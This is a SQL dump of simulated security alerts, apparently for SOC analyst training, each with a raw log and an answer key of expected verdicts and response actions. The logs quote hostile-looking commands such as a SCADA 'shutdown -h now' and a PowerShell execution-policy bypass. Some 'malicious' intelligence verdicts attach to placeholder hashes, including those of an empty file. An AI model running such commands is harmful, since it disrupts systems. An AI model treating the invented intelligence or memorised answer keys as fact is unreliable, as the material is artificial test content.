(272, 'SCADA System Compromise', 'critical', 'SCADA Logs', 'Unauthorized command executions detected on SCADA systems, coinciding with a power outage. The attackers issued commands to disrupt power distribution, leading to a blackout.', 'Execution', 'T0811', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T02:45:12Z\",\"system_id\":\"SCADA-CTRL-01\",\"event_type\":\"command_execution\",\"user\":\"unauthorized_user\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.20\",\"command_executed\":\"shutdown -h now\",\"external_attacker_ip\":\"203.0.113.45\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"malicious_script.sh\"}', '2025-12-31 13:10:04', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network scan\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence feed\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP involved in previous SCADA attacks\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious script used in SCADA disruptions\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_script.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"file analysis\",\"verdict\":\"malicious\",\"details\":\"Script designed to disrupt power distribution systems\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"unauthorized_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"user audit logs\",\"verdict\":\"suspicious\",\"details\":\"User account used without authorization\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(273, 'Malware Detected: Suspicious Process Execution on Host', 'high', 'CrowdStrike', 'A suspicious process \'malware.exe\' was executed on the host \'INTERNAL-PC01\' originating from an external IP known for malicious activity. The hash of the file matches a known malware sample.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2023-10-11T14:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.5\",\"username\":\"jdoe\",\"hostname\":\"INTERNAL-PC01\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"process_name\":\"malware.exe\"}', '2025-12-31 13:30:07', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample \'Trojan.Generic\'\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The alert is a true positive as the process executed matches a known malware signature and originates from a malicious IP. Immediate action is required to contain the threat.\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS'),
(274, 'Phishing Attempt via Weaponized Job Offers', 'medium', 'Email Gateway', 'The Lazarus Group has sent a phishing email to a developer at the company, masquerading as a recruiter with a lucrative job offer. The email contains a malicious attachment designed to harvest credentials.', 'Phishing', 'T1566.001 - Spearphishing Attachment', 1, 'investigating', 34, '{\"timestamp\":\"2023-09-25T13:45:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"email_from\":\"recruiter@example.com\",\"email_to\":\"dev.user@company.com\",\"subject\":\"Exciting Job Opportunity!\",\"attachment_name\":\"JobOffer.docm\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"action\":\"Email Received\"}', '2025-12-31 13:43:07', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"recruiter@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"suspicious\",\"details\":\"Email domain has been reported in phishing campaigns\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"JobOffer.docm\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Document contains macros used for credential harvesting\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash for malicious document containing macros\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(275, 'Malicious Code Execution on Developer Systems', 'high', 'EDR', 'Malicious code executed on developer systems following a successful phishing attack, providing attackers access to the DeFi platform\'s development environment.', 'Malware', 'T1059.001: Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:22:35Z\",\"event_id\":\"4567\",\"event_type\":\"process_creation\",\"user\":\"dev_user01\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\dev_user01\\\\malicious_script.ps1\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"additional_info\":{\"file_path\":\"C:\\\\Users\\\\dev_user01\\\\malicious_script.ps1\"}}', '2025-12-31 13:43:07', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"dev_user01\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User account on the development system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP of the developer\'s machine.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous cyber attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"PowerShell script used to execute malicious commands.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(276, 'Establishing Persistence and Lateral Movement', 'high', 'Network Traffic Analysis', 'Attackers are using compromised credentials to move laterally within the DeFi platform\'s network, aiming to escalate privileges and maintain access across critical systems.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"10.0.0.5\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"method\":\"SMB\",\"file_transferred\":\"persistence_tool.exe\",\"hash\":\"3f5d8f3e5c4c4099d2a3f3a7b9b7b6f1\",\"action\":\"Successful Authentication\",\"protocol\":\"SMB\",\"severity\":\"High\"}', '2025-12-31 13:43:07', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network logs\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with lateral movement activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal network logs\",\"verdict\":\"internal\",\"details\":\"Critical system targeted for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"External IP known for malicious activities.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal user database\",\"verdict\":\"internal\",\"details\":\"Compromised user account used for unauthorized access.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"persistence_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware analysis\",\"verdict\":\"malicious\",\"details\":\"File used for establishing persistence within the network.\"}},{\"id\":\"artifact_6\",\"type\":\"hash\",\"value\":\"3f5d8f3e5c4c4099d2a3f3a7b9b7b6f1\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash lookup\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NULL', 1, 0, NULL);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES
(277, 'Cryptocurrency Exfiltration and Laundering', 'critical', 'Blockchain Analysis', 'The operation culminates in the transfer of $600 million worth of cryptocurrency from the DeFi platform’s wallets. The attackers employ mixer services to launder the funds, making tracking and recovery efforts challenging.', 'Exfiltration', 'T1567 - Exfiltration Over Web Service', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:45:30Z\",\"event_id\":\"evt-2023-cryptoxfil-004\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.0.0.5\",\"transaction_id\":\"0x9f1b3e91e7b8f3c4c9f1a4a3d9b7b0d6\",\"transfer_amount\":\"600000000\",\"currency\":\"USD\",\"destination_address\":\"1MixerServiceX1yZ3w4V5\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"user\":\"attacker@malicious.com\",\"filename\":\"exfil_transaction_details.csv\"}', '2025-12-31 13:43:07', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known cybercrime activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Blockchain Explorer\",\"verdict\":\"malicious\",\"details\":\"Hash used in fraudulent transaction.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"attacker@malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Spamhaus\",\"verdict\":\"malicious\",\"details\":\"Email linked to multiple phishing campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"exfil_transaction_details.csv\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Filename indicates potential data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(278, 'Compromised Update Detected', 'high', 'Software Update Logs', 'A malicious DLL was detected within a signed update package of the server management software. The package was distributed to users, potentially granting attackers initial access.', 'Malware', 'T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T12:34:56Z\",\"event_id\":\"update_12345\",\"update_source\":\"server_mgmt_software\",\"update_version\":\"v3.2.1\",\"affected_component\":\"lib_mgmt.dll\",\"malicious_hash\":\"e5d8870e5bdd26602c622b7e5b0f6b4c\",\"signed_cert\":\"CN=ServerMgmt, O=TrustedSoftware Inc.\",\"source_ip\":\"192.168.1.15\",\"attacker_ip\":\"203.0.113.45\",\"user\":\"admin_user\",\"filename\":\"lib_mgmt.dll\"}', '2025-12-31 13:45:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous cyber attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e5d8870e5bdd26602c622b7e5b0f6b4c\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of a malware distribution campaign.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"lib_mgmt.dll\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Software Repository\",\"verdict\":\"internal\",\"details\":\"Filename matches legitimate component, but altered.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"Authorized user for software management.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(279, 'Execution of Malicious Code', 'high', 'Endpoint Detection and Response (EDR)', 'Once the update is installed, the malicious DLL executes its payload, allowing the attacker to establish an initial presence within the network.', 'Execution', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:47Z\",\"event_id\":\"EDR-EXEC-20231005-143\",\"hostname\":\"compromised-host-01\",\"user\":\"jdoe\",\"process_name\":\"rundll32.exe\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\malicious.dll\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"internal_ip\":\"192.168.1.15\",\"external_ip\":\"203.0.113.45\",\"action\":\"Execute\",\"outcome\":\"Success\",\"additional_info\":\"The DLL was executed remotely via rundll32.exe, establishing a reverse shell.\"}', '2025-12-31 13:45:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by multiple engines as a trojan.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known command and control server.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Local Database\",\"verdict\":\"malicious\",\"details\":\"File associated with recent compromise attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"User is a legitimate employee.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(280, 'Establish Persistence', 'high', 'Intrusion Detection System (IDS)', 'An advanced persistent threat actor has set up a backdoor to maintain access to compromised systems by creating a persistent service. This allows for continued unauthorized access even if initial malware is removed.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-09-14T02:45:12Z\",\"event_id\":\"12345678\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"user\":\"admin_user\",\"action\":\"establish_persistence\",\"persistence_type\":\"service_creation\",\"service_name\":\"UpdateService\",\"service_exe\":\"C:\\\\Windows\\\\System32\\\\updater.exe\",\"file_hash\":\"abc123def4567890abc123def4567890\",\"status\":\"success\"}', '2025-12-31 13:45:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with multiple APT groups.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server targeted by the attacker.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"abc123def4567890abc123def4567890\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known malware samples.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account used for unauthorized service creation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(281, 'Lateral Movement and Data Exfiltration', 'high', 'Network Traffic Analysis', 'Detected lateral movement activities with potential data exfiltration attempts. Anomalous network traffic indicates movement from compromised host to sensitive data repositories.', 'Lateral Movement', 'T1021 - Remote Services', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_id\":\"1002\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"10.0.0.55\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"file_accessed\":\"confidential_data.xlsx\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"event_type\":\"network_traffic\",\"action\":\"exfiltration_attempt\"}', '2025-12-31 13:45:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Compromised internal host used for lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Targeted internal server storing sensitive data.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"External Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Confirmed malicious IP associated with known threat actor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Integrity Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file accessed during suspicious network activity.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Hash Database\",\"verdict\":\"clean\",\"details\":\"File hash matches known clean version.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Activity Monitoring\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised for lateral movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NULL', 1, 0, NULL),
(282, 'Malware Detected via Suspicious Process Execution', 'high', 'CrowdStrike', 'A suspicious process \'malicious.exe\' was executed on the host \'DESKTOP-1234\'. The file hash is associated with known malware.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2023-10-15T14:32:21Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.50\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-1234\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"process_name\":\"malicious.exe\"}', '2025-12-31 14:09:48', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address belonging to the organization\'s network.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash is identified as a part of a known malware family.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Process execution behavior is indicative of malware.\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process \'malicious.exe\' is executed from an internal machine and is linked to a known malware hash. Immediate isolation and further investigation are necessary.\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS'),
(283, 'Suspicious Network Connection from External IP Detected', 'high', 'Firewall', 'A network connection from an external IP was detected attempting to access an internal server. The connection was flagged due to a high number of failed login attempts.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"internal-server-01\",\"failed_attempts\":35}', '2026-01-01 01:58:11', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address belonging to the organization\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Common administrative account\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP has been involved in multiple brute force attacks, indicating malicious intent.\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS'),
(284, 'Malware Detected via Suspicious Process Execution', 'critical', 'CrowdStrike', 'A suspicious process execution was detected on a host, linked to known malware activity. The process attempted to connect to a known malicious Command and Control server.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2023-10-12T16:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.23\",\"dst_ip\":\"198.51.100.17\",\"hostname\":\"workstation-07\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"process_name\":\"malicious.exe\"}', '2025-12-31 20:54:16', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.17\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP linked to Command and Control servers\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected workstation\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process execution and connection to a known C2 server confirm malware infection.\"}', 'Advanced', 'EDR', 1, 0, 'OT_ICS'),
(285, 'Spear-Phishing Email Campaign Detected', 'high', 'Email Gateway', 'APT28 initiates their campaign by sending carefully crafted spear-phishing emails to key personnel within political organizations, aiming to harvest credentials and gain a foothold in the network.', 'Phishing', 'T1566.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:47:23Z\",\"source_ip\":\"185.92.220.34\",\"destination_ip\":\"10.0.2.15\",\"email_subject\":\"Urgent: Review Attached Document\",\"sender_email\":\"john.doe@fakeorg.com\",\"recipient_email\":\"alice.smith@politicalorg.org\",\"attachment_filename\":\"Urgent_Document.pdf\",\"attachment_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"malicious_link\":\"http://malicious-link.com/login\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\"}', '2025-12-31 15:17:10', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"Reported for phishing activities.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"john.doe@fakeorg.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"malicious\",\"details\":\"Known phishing sender.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with phishing documents.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-link.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLhaus\",\"verdict\":\"malicious\",\"details\":\"Hosting phishing page.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
